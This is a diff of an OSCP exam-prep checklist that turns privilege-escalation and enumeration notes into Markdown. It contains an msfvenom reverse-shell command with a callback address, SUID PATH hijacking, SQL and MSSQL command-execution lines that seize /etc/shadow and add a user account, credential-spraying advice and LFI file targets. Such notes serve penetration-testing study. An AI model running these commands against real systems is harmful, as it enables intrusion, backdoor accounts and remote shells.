conma293/OSCP-tools/Checklist.md

 chmod +x /tmp/cast
 export PATH=/tmp:$PATH
 ./runcatSUID

   Another trick is to create a reverse shell with msfvenom and place that in the set PATH (msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.223 LPORT=555 -f elf -o shell) Execute OS Commands from within SQL

  SQL:
 \! whoami
 sys_exec('chown john.john /etc/shadow')
 SELECT sys_exec("net users lecon lecon /add");
 MSSQL:
 EXEC xp_cmdshell 'dir *.exe';
 GO

 If your stuck:
-● Vector
+#### Vector
-○ Enumerate more...
+- Enumerate more...
 FROM THE TOP, do NOT SKIP ANY STEPS!!
-○ When enumerating use more than one wordlist! (i.e., gobuster); also - did you check robots.txt?
+- When enumerating use more than one wordlist! (i.e., gobuster); also - did you check robots.txt?
-○ page?=foo - TRY MORE HARDER for LFI/RFI/SQL UNION
+- page?=foo - TRY MORE HARDER for LFI/RFI/SQL UNION

-○ Creds - If you have any usernames, throw them at other services, use fasttrack.lst and the enumd username variations as password.
+- Creds - If you have any usernames, throw them at other services, use fasttrack.lst and the enumd username variations as password.

-● Shell
+#### Shell
-○ Test basic connectivity by using raw netcat to verify connection back ○ Use basic ports for egress: 80/443/25/53
+- Test basic connectivity by using raw netcat to verify connection back
+- Use basic ports for egress: 80/443/25/53
-○ Use basic payload: windows/shell_reverse_tcp
+- Use basic payload: windows/shell_reverse_tcp
-○ Speak the language the machine wants to, not what is convenient.
+- Speak the language the machine wants to, not what is convenient.

 Interesting files to look for via LFI/Traversal (REMEMBER TO USE nullbyte ‘%00’ to terminate serverside for LFI)
-● Windows
+#### Windows
-○ C:\boot.ini
-○ WINDOWS\System32\drivers\etc\hosts
-○ WINDOWS/system32/prodspec.ini
+- ```C:\boot.ini```
+- ```WINDOWS\System32\drivers\etc\hosts```
+- ```WINDOWS/system32/prodspec.ini```

 # Essential Reading